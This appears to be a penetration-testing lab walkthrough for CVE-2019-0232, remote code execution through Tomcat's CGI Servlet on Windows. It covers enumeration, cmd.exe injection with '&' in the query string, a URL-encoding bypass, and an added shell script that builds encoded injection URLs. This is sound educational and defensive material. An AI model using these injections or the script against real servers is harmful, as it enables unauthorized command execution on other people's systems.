1. Vulnerability Overview
CVE-2019-0232 - Remote Code Execution (RCE)
Description: Remote code execution on Windows through Tomcat's CGI Servlet when enableCmdLineArguments is true. With that option on, the servlet passes the request's query string to the CGI script as command-line arguments, and a bug in the way the JRE hands command-line arguments to Windows lets an attacker smuggle additional cmd.exe commands into that argument list.
Affected Versions (Windows only):
Tomcat 9.0.0.M1 to 9.0.17
Tomcat 8.5.0 to 8.5.39
Tomcat 7.0.0 to 7.0.93
Fixed in 9.0.19, 8.5.40 and 7.0.94, which also change the default of enableCmdLineArguments to false.
Cause:
Following RFC 3875, a GET query string that contains no unencoded = is split on + and each piece is URL-decoded and appended to the script's command line. On Windows the resulting command line is re-parsed by cmd.exe, which honours metacharacters such as &, so an attacker-controlled argument becomes a second command. The affected releases apply no validation to these arguments before execution.
2. Enumeration
Port Scanning (nmap)
Identify open ports and running services, in particular an Apache Tomcat instance (commonly on 8080) and the Windows OS, since this issue only affects Windows hosts.
nmap -p- -sC -Pn 10.129.204.227 --open
CGI Script Discovery (ffuf)
Discover CGI scripts by fuzzing the path served by the CGI Servlet with a wordlist, appending the .bat extension to each candidate (put ffuf's FUZZ keyword where the script name goes, e.g. FUZZ.bat). On a Windows target the CGI scripts are batch files, and this fuzzing may reveal welcome.bat, which is the script used in the steps below.
3. Exploitation
Basic Command Injection
Execute the dir command to list files by appending ?&dir to the script URL. The query string contains no =, so the servlet passes the single argument &dir on the script's command line; cmd.exe reads & as a command separator and runs dir after the batch file. dir is a cmd.exe built-in, so it works even though the child process has no PATH.
Retrieve Environment Variables
Check for useful system environment variables by injecting a command that dumps the environment (cmd's set built-in). The CGI Servlet builds the child's environment from the CGI meta-variables only and does not pass the server's own environment through unless passShellEnvironment is enabled.
This can reveal critical information, such as the PATH variable being unset, which explains why a bare whoami fails.
Hardcoded Path Execution (whoami)
Attempt to execute whoami.exe by specifying its full path, e.g. C:\Windows\System32\whoami.exe, since there is no PATH to resolve it.
Sent raw, this request may never reach the servlet: Tomcat's HTTP connector rejects request targets containing characters that RFC 3986 does not allow in a query, such as the backslash, and answers with HTTP 400.
URL Encoding Bypass
Bypass that character filtering by percent-encoding the argument: \ becomes %5C and : becomes %3A; any = or + inside the command must also be encoded (%3D, %2B) because = disables command-line argument passing and + is the argument separator.
The connector accepts the encoded request, and the CGI Servlet URL-decodes each argument before handing it to the process, so cmd.exe receives the original path and whoami.exe runs despite the input restrictions.
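The request construction described in the steps above, as an added example that is not part of the original page and not Tomcat's own code: a POSIX shell helper that percent-encodes an injected command so it passes the connector's request-target check and stays a single CGI argument, joins several arguments with the + separator (a generalisation of the single-argument requests above), and assembles the final URL. Only the host 10.129.204.227 and the script name welcome.bat come from the page; port 8080 and the /cgi/ prefix are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page or from Tomcat): helpers that
# build query strings for Tomcat's CGI Servlet when enableCmdLineArguments
# is on. Rules the servlet applies (RFC 3875 section 4.4):
#   - the query string becomes command-line arguments only if it contains
#     no unencoded '=';
#   - it is split on '+' into arguments, each of which is URL-decoded.
# Tomcat's HTTP connector also rejects a raw '\' in the request target with
# HTTP 400, so a Windows path has to be percent-encoded to reach the servlet.

# Percent-encode every character outside the URL "unreserved" set.
# ASCII input only; multi-byte characters are out of scope here.
cgi_encode() {
    enc_in=$1
    enc_out=""
    while [ -n "$enc_in" ]; do
        enc_rest=${enc_in#?}            # everything after the first char
        enc_ch=${enc_in%"$enc_rest"}    # the first char itself
        case $enc_ch in
            [A-Za-z0-9._~-]) enc_out="$enc_out$enc_ch" ;;
            *) enc_out="$enc_out$(printf '%%%02X' "'$enc_ch")" ;;
        esac
        enc_in=$enc_rest
    done
    printf '%s' "$enc_out"
}

# Encode each argument separately and join them with '+', the CGI
# argument separator, so "dir" "/b" becomes dir+%2Fb.
cgi_args() {
    args_out=""
    for args_a in "$@"; do
        args_e=$(cgi_encode "$args_a")
        args_out="${args_out:+$args_out+}$args_e"
    done
    printf '%s' "$args_out"
}

# Exit 0 when the servlet would treat a raw query string as command-line
# arguments, i.e. it contains no unencoded '='.
cgi_query_is_cmdline() {
    case $1 in
        *=*) return 1 ;;
        *)   return 0 ;;
    esac
}

# Build the injection URL: script URL, then '?&' and the encoded command.
# '&' is cmd.exe's command separator, so the batch file's own command line
# ends there and the injected command begins.
cgi_inject_url() {
    url_base=$1
    shift
    printf '%s?&%s' "$url_base" "$(cgi_args "$@")"
}

# Assumed target: host from the page, port 8080 and /cgi/ prefix assumed.
TARGET="http://10.129.204.227:8080/cgi/welcome.bat"
printf '%s\n' "$(cgi_inject_url "$TARGET" dir)"
printf '%s\n' "$(cgi_inject_url "$TARGET" set)"
printf '%s\n' "$(cgi_inject_url "$TARGET" 'c:\windows\system32\whoami.exe')"
# To send one of them (network access required):
#   curl -s "$(cgi_inject_url "$TARGET" 'c:\windows\system32\whoami.exe')"
```

The encoder deliberately encodes more than the connector strictly requires (every non-unreserved byte), which costs nothing because the servlet URL-decodes each argument anyway; it is the simplest rule that guarantees =, + and \ never reach Tomcat unencoded.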
4. Key Considerations
The enableCmdLineArguments setting must be enabled for this exploit to work. The affected releases enable it by default; the fixed releases (9.0.19, 8.5.40, 7.0.94) default it to false and add the cmdLineArgumentsDecoded pattern check, so on a patched server the injected argument is rejected. Only Windows hosts are affected.
The & character is used to separate commands in the injection: cmd.exe treats it as a command separator when it re-parses the script's command line.
If the PATH environment variable is unset, external programs such as whoami.exe must be executed with their full path; cmd.exe built-ins such as dir and set still work.
URL encoding can help bypass character filtering, because the connector validates the raw request target while the CGI Servlet decodes each argument before execution. Keep = and + encoded inside the command, since they control argument passing.
Only test on systems you have explicit permission to assess.
Replace IP addresses, ports, and URLs with your specific target information.
5. Commands Summary